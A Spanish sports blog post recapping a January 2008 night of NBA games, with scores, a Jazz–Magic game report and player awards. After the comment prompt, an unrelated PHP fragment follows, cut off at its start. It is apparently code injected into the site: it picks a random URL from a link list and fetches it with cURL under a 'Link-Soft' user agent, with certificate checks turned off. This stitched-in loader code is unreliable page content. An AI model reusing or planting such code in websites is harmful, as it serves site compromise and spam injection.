La crónica (12/01/08)

13 de January de 2008 por Jabho

Nueve partidos se jugaron en la noche de ayer y algunos con resultados inesperados. Si llegas a un final apretado y tienes a Hamilton en tu equipo harás bien dejando que se la juegue él. Ayer suyos fueron los últimos 4 puntos de la prórroga que suponian la victoria de Detroit ante Charlotte. En Washington los locales dominaron claramente el rebote y por ahí ganaron un partido ante Boston. Los verdes salieron con la baja del base titular Rondo y hubo fases del partido en la que le echaron de menos, demostrando así que un base suplente no les vendría mal. Que los Timberwolves hubieran ganado a los Spurs en San Antonio hubiera sido una gran sorpresa. No pasó. Los tejanos recuperan además a Manu a un buen nivel y se preparan para encarar la fase mas importante de la liga en buena forma. Los Bucks y los Suns son dos de los equipos que menos defienden. Ayer jugaron un partido de 236 puntos. Ganó el mejor de los dos, esto es los Suns, pero al menos los Bucks dejan una buena imagen dada la mala temporada que llevan. Los Pacers ganaron a los Kings en un duelo de equipos que seguramente necesitan cambios. Dunleavy fue el mejor algo que ya no es noticia este año. Los Mavericks ganaron a los Clippers en el último segundo con un tiro ganador de Stackhouse. Es la séptima victoria consecutiva de Dallas, la mejor racha actualmente en la liga. Por último victoria de los Jazz ante los Nuggets en el partido que comentaremosmas adelante.

 

 

Resultados

Pistons 103 – 100 Bobcats

Celtics 78 – 85 Wizards

Timberwolves 88 – 105 Spurs

Bucks 114 – 122 Suns

Pacers 111 – 105 Kings

Mavericks 95 – 94 Clippers

El partido de la noche

Magic 115 – Jazz 119

En Utah pueden frotarse las manos si a la pareja Williams&Boozer, se les unen por fin Okur y Kirilenko, ambos en forma y haciendo todo lo que saben. En la noche de ayer el turco martilleó desde la linea de 3 a los Magics, mientras Kirilenko complementaba al resto en cada faceta del juego. Aun así Orlando tuvo el partido en sus manos, ya que falló 11 tiros libres en un partido decidido por 4 puntos. Las clave del partido la encontramos en las 32 asistencias que repartieron los de Sloan, el doble que su rival, lo que dió lugar a un porcentaje de tiro del 53.4% en los vencedores.

Por los Jazzs, Okur lideró la anotación con 29 puntos (máximo de la temporada para el), completando su actuación con 8 rebotes, 2 tapones y un gran 10 de 15 en tiros. El ruso rozó el triple doble con 16-7-8 y un casi inmaculado 6 de 7 en tiros. Deron Williams ofreció un nivel algo inferior al habitual y dejó un 17-11, con 6 de 15 en tiros y 4 pérdidas de balon. Boozer no pudo con Howard (ni entre Okur y el), 15-10, con 5 pérdidas y un mal dia en el tiro. Brewer y Harpring alcanzaron 11 puntos cada uno.

Dwight Howard fue una vez mas el lider de Orlando y cerró su actuación con 29-15-3, sin perdidas de balón, y tuvo una buena marca desde la linea de personal (17 de 24), aunque falló 6 de sus últimos 8 intentos. Lewis secundó a Howard con 27-6-3 a pesar de su mal dia desde la linea de 3, y otros 4 jugadores alcanzaron los dobles dígitos en anotación.

Los destacados de anoche

MVP: Steve Nash asumió sin problemas el papel de anotador para paliar la baja de Grant Hill. El base canadiense llegó hasta los 35 puntos con unos abrumadores 13 de 17 en tiros de campo (5 de 7 en triples), un perfecto 4 de 4 en tiros libres y sin olvidarse de repartir juego, sumó 7 asistencias.

Rookie: No tenemos mas remedio que dejar desierto este premio, ya que ninguno de los novatos que jugaron ayer lo hizo con especial acierto, aunque alguno como Dudley dispuso de 30 minutos de juego.

Sorpresa: DeShawn Stevenson lideró a los Wizars a la victoria ante el Big Three de los Celtics. Es escolta anotó 19 puntos y capturó 6 rebotes, además de secar a Ray Allen. Boris Diaw es otro que ha aprovechado la baja de Hill, demostró toda su categoría con 21-11, ayudando a Phoenix en su victoria frente a los Bucks.

Decepción: Los Celtics en general, personificado en Ray Allen que cuajó una pésima actuación con 8 puntos, 3 pérdidas y un 3 de 13 en tiros de campo. Los de Boston perdieron frente a unos Wizars sin Arenas y con malos partidos de Jamison y Butler de cara al aro, los capitalinos consiguieron 49 rebotes, 20 de ellos ofensivos, lo que deja muestra de la pasividad que exhibió uno de los grandes candidatos al título.

Os dejamos con las mejores jugadas de ayer

 

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>